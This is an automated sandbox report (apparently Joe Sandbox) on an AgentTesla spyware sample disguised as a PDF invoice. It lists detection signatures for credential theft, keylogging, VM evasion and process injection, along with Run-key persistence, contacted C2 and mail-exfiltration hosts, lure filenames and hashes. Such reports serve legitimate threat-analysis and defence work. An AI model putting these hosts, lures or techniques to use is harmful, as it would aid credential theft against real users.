                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion25Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncApplication Window Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemRemote System Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 356536 Sample: A4-058000200390-10-14_REV_pdf.exe Startdate: 23/02/2021 Architecture: WINDOWS Score: 100 70 Found malware configuration 2->70 72 Multi AV Scanner detection for submitted file 2->72 74 Yara detected AgentTesla 2->74 76 3 other signatures 2->76 7 NewApp.exe 14 3 2->7         started        11 A4-058000200390-10-14_REV_pdf.exe 15 3 2->11         started        13 NewApp.exe 2->13         started        process3 dnsIp4 78 Multi AV Scanner detection for dropped file 7->78 80 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->80 82 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 7->82 84 Contains functionality to register a low level keyboard hook 7->84 15 NewApp.exe 7->15         started        19 cmd.exe 7->19         started        21 WerFault.exe 7->21         started        52 coroloboxorozor.com 104.21.71.230, 49734, 49753, 49764 CLOUDFLARENETUS United States 11->52 54 192.168.2.1 unknown unknown 11->54 86 Hides threads from debuggers 11->86 88 Injects a PE file into a foreign processes 11->88 90 Contains functionality to hide a thread from the debugger 11->90 23 A4-058000200390-10-14_REV_pdf.exe 2 9 11->23         started        26 cmd.exe 1 11->26         started        28 WerFault.exe 23 9 11->28         started        30 cmd.exe 13->30         started        32 NewApp.exe 13->32         started        34 WerFault.exe 13->34         started        signatures5 process6 dnsIp7 58 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->58 60 Tries to steal Mail credentials (via file access) 15->60 62 Tries to harvest and steal ftp login credentials 15->62 64 Tries to harvest and steal browser information (history, passwords, etc) 15->64 36 conhost.exe 19->36         started        38 timeout.exe 19->38         started        56 mail.soonlogistics.com 103.17.211.69, 49763, 49765, 49775 IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMY Malaysia 23->56 48 C:\Users\user\AppData\Roaming\...48ewApp.exe, PE32 23->48 dropped 50 C:\Users\user\...50ewApp.exe:Zone.Identifier, ASCII 23->50 dropped 66 Hides that the sample has been downloaded from the Internet (zone.identifier) 23->66 68 Installs a global keyboard hook 23->68 40 conhost.exe 26->40         started        42 timeout.exe 1 26->42         started        44 conhost.exe 30->44         started        46 timeout.exe 30->46         started        file8 signatures9 process10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      A4-058000200390-10-14_REV_pdf.exe13%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\NewApp\NewApp.exe13%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      31.2.NewApp.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      24.2.NewApp.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      8.2.A4-058000200390-10-14_REV_pdf.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      coroloboxorozor.com0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://cps.letsencrypt.org00%URL Reputationsafe
                      http://mail.soonlogistics.com0%Avira URL Cloudsafe
                      http://coroloboxorozor.com/base/BE0C9BE287721D2E1639C8881BC9F105.html0%Avira URL Cloudsafe
                      http://2nUtGMgnxihCA8N2g.org0%Avira URL Cloudsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://r3.o.lencr.org00%URL Reputationsafe
                      http://coroloboxorozor.com0%Avira URL Cloudsafe
                      http://coroloboxorozor.com/base/B7EFDEC15CD29E4CF1B708AC6486760D.html0%Avira URL Cloudsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://cps.root-x1.letsencrypt.org00%URL Reputationsafe
                      http://r3.i.lencr.org/00%URL Reputationsafe
                      http://r3.i.lencr.org/00%URL Reputationsafe
                      http://r3.i.lencr.org/00%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      coroloboxorozor.com
                      		104.21.71.230
                      		truefalseunknown
                      mail.soonlogistics.com
                      		103.17.211.69
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://coroloboxorozor.com/base/BE0C9BE287721D2E1639C8881BC9F105.htmlfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://2nUtGMgnxihCA8N2g.orgtrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://coroloboxorozor.com/base/B7EFDEC15CD29E4CF1B708AC6486760D.htmlfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifierWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.oWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                		high
                                http://cps.letsencrypt.org0A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                  		high
                                  http://mail.soonlogistics.comA4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.916340708.0000000002FFB000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916097296.0000000002A24000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.oWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                    		high
                                    http://r3.o.lencr.org0A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphoneWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephoneWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovinceWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                          		high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                            		high
                                            http://coroloboxorozor.comA4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameA4-058000200390-10-14_REV_pdf.exe, 00000000.00000002.697632475.0000000002C21000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, NewApp.exe, 00000012.00000002.817905457.0000000002F11000.00000004.00000001.sdmp, NewApp.exe, 00000013.00000002.818132626.0000000002601000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                              		high
                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/WerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                                  		high
                                                  http://cps.root-x1.letsencrypt.org0A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authenticationWerFault.exe, 0000000B.00000003.683834284.0000000005460000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.795863832.0000000005400000.00000004.00000001.sdmpfalse
                                                    		high
                                                    http://r3.i.lencr.org/0A4-058000200390-10-14_REV_pdf.exe, 00000008.00000002.920904751.00000000067E0000.00000004.00000001.sdmp, NewApp.exe, 00000018.00000002.916501179.0000000002A9A000.00000004.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    104.21.71.230
                                                    		unknownUnited States
                                                    		13335CLOUDFLARENETUSfalse
                                                    103.17.211.69
                                                    		unknownMalaysia
                                                    		45352IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMYtrue

                                                    Private

                                                    IP
                                                    192.168.2.1

                                                    General Information

                                                    Joe Sandbox Version:31.0.0 Emerald
                                                    Analysis ID:356536
                                                    Start date:23.02.2021
                                                    Start time:09:46:00
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 14m 14s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:A4-058000200390-10-14_REV_pdf.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:37
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@27/16@6/3
                                                    EGA Information:Failed
                                                    HDC Information:
                                                    • Successful, ratio: 0% (good quality ratio 0%)
                                                    • Quality average: 0%
                                                    • Quality standard deviation: 0%
                                                    HCA Information:
                                                    • Successful, ratio: 98%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                    • TCP Packets have been reduced to 100
                                                    • Excluded IPs from analysis (whitelisted): 168.61.161.212, 92.122.145.220, 52.147.198.201, 13.64.90.137, 51.104.139.180, 52.155.217.156, 20.54.26.129, 67.26.83.254, 8.248.117.254, 8.248.143.254, 8.253.95.120, 8.248.119.254, 92.122.213.247, 92.122.213.194, 104.43.193.48, 40.88.32.150, 51.104.144.132
                                                    • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    09:47:13API Interceptor3x Sleep call for process: WerFault.exe modified
                                                    09:47:15API Interceptor608x Sleep call for process: A4-058000200390-10-14_REV_pdf.exe modified
                                                    09:47:24AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run NewApp C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    09:47:32AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run NewApp C:\Users\user\AppData\Roaming\NewApp\NewApp.exe
                                                    09:48:11API Interceptor282x Sleep call for process: NewApp.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    104.21.71.230Purchase_order_397484658464974945648447564845.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/C02C82A7124B198823DC14A0727ADA5A.html
                                                    0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/008D1C43D45C0A742A0D32B591796DBD.html
                                                    VIws8bzjD5.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/C56E2AF17B6C065E85DB9FFDA54E4A78.html
                                                    quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/4FD4067B934700360B786D96F374CFDE.html
                                                    PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/13F70A6846505248D031FD970E34143C.html
                                                    PAYRECEIPT.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/FB9E1E734185F7528241A9972CE86875.html
                                                    New Order.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/787C0D9D971EA648C79BB43D6A91B32D.html
                                                    TT.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/67C230E277706E38533C2138734032C2.html
                                                    Payment_pdf.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/07E3F6F835A7792863F708E23906CE42.html
                                                    TT.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/40B9FF72D3F4D8DF64BA5DD4E106BE04.html
                                                    purchase order 1.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/AEF764C22A189B57AC28E3EBBC72AEBF.html
                                                    telex transfer.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/EB6932098F110FB9EB9C8B27A1730610.html
                                                    ORDER PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/20872932CF927ACBA3BF36E6C823C99C.html
                                                    Doc_3975465846584657465846486435454,pdf.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/92C7F4831C860C5A2BD3269A6771BC0C.html
                                                    CV-JOB REQUEST______pdf.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/38A59769F794F78901E2621810DAAA3A.html
                                                    CN-Invoice-XXXXX9808-19011143287989.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/6A5D4D8EB90B8B0F2BFECECFD3E55241.html
                                                    Download_quotation_PR #371073.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/ABC115F63E3898678C2BE51E3DFF397C.html
                                                    CN-Invoice-XXXXX9808-19011143287990.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/84D1B49C9212CA5D522F0AF86A906727.html
                                                    PurchaseOrdersCSTtyres004786587.exeGet hashmaliciousBrowse
                                                    • coroloboxorozor.com/base/532020C7A3B820370CFAAC4888397C0C.html

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    mail.soonlogistics.comSecuriteInfo.com.Gen.NN.ZemsilCO.34804.so0@a88aQDc.exeGet hashmaliciousBrowse
                                                    • 103.17.211.69
                                                    SecuriteInfo.com.Variant.MSILPerseus.227807.2953.exeGet hashmaliciousBrowse
                                                    • 103.17.211.69
                                                    coroloboxorozor.comPurchase_order_397484658464974945648447564845.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    Payment_pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    RG6ws8jWUJ.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    VIws8bzjD5.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    PAYMENTADVICENOTE103_SWIFTCOPY0909208.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    XP 6.xlsxGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    PAYRECEIPT.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    New Order.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    PO#87498746510.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    TT.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    Payment_pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    TT.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    purchase order 1.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    telex transfer.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    Invoices.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17

                                                    ASN

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    CLOUDFLARENETUSSecuriteInfo.com.Trojan.GenericKD.36273230.25906.exeGet hashmaliciousBrowse
                                                    • 104.21.50.15
                                                    v2.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    Purchase_order_397484658464974945648447564845.exeGet hashmaliciousBrowse
                                                    • 104.21.71.230
                                                    0603321WG_0_1 pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    Payment_pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    8WjU4jrBIr.exeGet hashmaliciousBrowse
                                                    • 104.23.98.190
                                                    RG6ws8jWUJ.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    8TD8GfTtaW.exeGet hashmaliciousBrowse
                                                    • 104.23.99.190
                                                    lpdKSOB78u.exeGet hashmaliciousBrowse
                                                    • 104.21.76.239
                                                    VIws8bzjD5.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    PURCHASE ITEMS.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    Shipping Document PL&BL Draft.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    CN-Invoice-XXXXX9808-19011143287992.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    Halkbank_Ekstre_20210223_082357_541079.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    quotation_PR # 00459182..exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    FOB offer_1164087223_I0133P2100363812.PDF.exeGet hashmaliciousBrowse
                                                    • 104.21.19.200
                                                    PURCHASE ORDER CONFIRMATION.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    22 FEB -PROCESSING.xlsxGet hashmaliciousBrowse
                                                    • 172.67.160.246
                                                    Yao Han Industries 61007-51333893QR001U,pdf.exeGet hashmaliciousBrowse
                                                    • 172.67.188.154
                                                    PAYMENTADVICENOTE103_SWIFTCOPY0909208.exeGet hashmaliciousBrowse
                                                    • 172.67.172.17
                                                    IPSERVERONE-AS-APIPServerOneSolutionsSdnBhdMYhSHH16k9JyrJp5w.exeGet hashmaliciousBrowse
                                                    • 14.102.148.13
                                                    J20KD8zhh6Daj1S.exeGet hashmaliciousBrowse
                                                    • 14.102.148.13
                                                    SecuriteInfo.com.Gen.NN.ZemsilCO.34804.so0@a88aQDc.exeGet hashmaliciousBrowse
                                                    • 103.17.211.69
                                                    https://www.canva.com/design/DAEJ8WkMgI4/_KLUOn175CqxOwu-gNDpeQ/view?utm_content=DAEJ8WkMgI4&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                    • 103.21.183.202
                                                    http://orchardwellness.com/@gebm.com/Drive/dgk8g6jmx3cglwh10pfby2e4.php?HK10LC1602020639f9cf11e1daa1ccf847fe84bfef86c32cf9cf11e1daa1ccf847fe84bfef86c32cf9cf11e1daa1ccf847fe84bfef86c32cf9cf11e1daa1ccf847fe84bfef86c32cf9cf11e1daa1ccf847fe84bfef86c32c&email=&error=Get hashmaliciousBrowse
                                                    • 103.21.183.202
                                                    OpxX14nKsz.xlsGet hashmaliciousBrowse
                                                    • 103.21.180.162
                                                    280122622-310820.docGet hashmaliciousBrowse
                                                    • 212.8.231.101
                                                    DEBIT NOTE USD 5.412.exeGet hashmaliciousBrowse
                                                    • 210.5.47.198
                                                    SecuriteInfo.com.Variant.MSILPerseus.227807.2953.exeGet hashmaliciousBrowse
                                                    • 103.17.211.69
                                                    430#U0437.jsGet hashmaliciousBrowse
                                                    • 183.81.162.20
                                                    430#U0437.jsGet hashmaliciousBrowse
                                                    • 183.81.162.20
                                                    http://www.ukmsc-gammaknife.com/wp-includes/ID3/bd4a7db75b1640babb7197913dcb6955/97913dcb6955/Get hashmaliciousBrowse
                                                    • 103.21.182.63
                                                    http://weddingstudio.com.my/Amazon/En/Orders-details/012019Get hashmaliciousBrowse
                                                    • 14.102.148.45

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    No context

                                                    Created / dropped Files

                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_A4-058000200390-_22b30012e2a9340b0356f203be6ce5a2ae6da_1d3dc762_18d9dc37\Report.wer
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):16300
                                                    Entropy (8bit):3.7739596920682645
                                                    Encrypted:false
                                                    SSDEEP:192:GsimHBUZMXSaKsUAeZiN/u7sKS274ItAe:DjBUZMXSalmW/u7sKX4ItAe
                                                    MD5:BFC6839F910B613933C59C1C408AB511
                                                    SHA1:3A752F2786D7A4C4B1BF2677894502125A6C3FF4
                                                    SHA-256:E056EF80AEC8B461C658F26BEB6A29D854E53CD1BD7A9E263B7BE7855A9B2DCD
                                                    SHA-512:C1192932BA235A243B3CC95484BFB5FDFCB6AA605B2770EE77B615AAC7C280D521258803D0D3127E7B88B4B00AE0A7F7AD773FA94711CD486380F699C36D62D7
                                                    Malicious:false
                                                    Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.8.5.4.3.6.2.1.3.9.6.0.7.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.8.5.4.3.6.2.9.7.8.6.6.6.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.f.7.8.5.0.f.8.-.c.4.b.2.-.4.7.7.9.-.9.2.e.9.-.d.6.c.0.1.c.1.b.3.7.3.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.b.a.9.5.8.3.3.-.1.6.d.a.-.4.5.b.f.-.9.d.9.5.-.e.1.8.1.2.0.4.e.0.f.f.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.4.-.0.5.8.0.0.0.2.0.0.3.9.0.-.1.0.-.1.4._.R.E.V._.p.d.f...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.8.0.-.0.0.0.1.-.0.0.1.b.-.8.b.e.8.-.a.6.6.b.c.0.0.9.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.1.c.a.0.5.b.f.3.9.9.8.9.2.6.d.7.f.e.3.7.a.9.8.e.9.c.0.8.1.2.9.0.0.0.0.0.9.0.4.!.0.0.0.0.b.5.2.d.9.b.a.9.b.7.8.9.0.e.2.b.5.1.e.6.4.a.b.8.8.9.8.0.5.c.f.c.e.5.1.2.6.e.b.b.!.A.4.-.0.
                                                    C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_NewApp.exe_2b4ac1a517da4509e55ae841ecc74477b428236_b4418cc1_06f2fc1e\Report.wer
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):15900
                                                    Entropy (8bit):3.7649375025832814
                                                    Encrypted:false
